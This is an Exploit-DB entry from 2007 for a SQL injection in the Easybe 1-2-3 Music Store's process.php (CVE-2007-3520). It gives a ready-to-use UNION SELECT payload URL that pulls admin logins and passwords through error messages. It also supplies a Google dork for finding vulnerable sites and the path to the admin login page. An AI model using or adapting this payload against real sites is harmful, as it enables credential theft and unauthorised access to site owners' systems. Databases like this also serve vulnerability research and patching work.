Easybe 1-2-3 Music Store - 'process.php' SQL Injection

EDB-ID:

4134

CVE:

2007-3520

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-07-01

Vulnerable App:

--==+================================================================================+==--
--==+               Easybe 1-2-3 Music Store  SQL Injection Vulnerability            +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.easybe.com/
DORK: intext:"Powered by the 1-2-3 music store"

DESCRIPTION: SQL injection in CatagoryID of process.php, able to retrieve admin/pass through
error message.

EXPLOIT: 
http://www.site.com/123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,login,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*

NOTE:
The CatagoryID value gets passed to a couple SELECT statements and we couldn't get
the results to display inline so we made the data you want to see red in the error msg.

Admin login is in /process.php?pname=ShowPageProcess-Start&page=admin/index

GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+               Easybe 1-2-3 Music Store  SQL Injection Vulnerability            +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-01]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services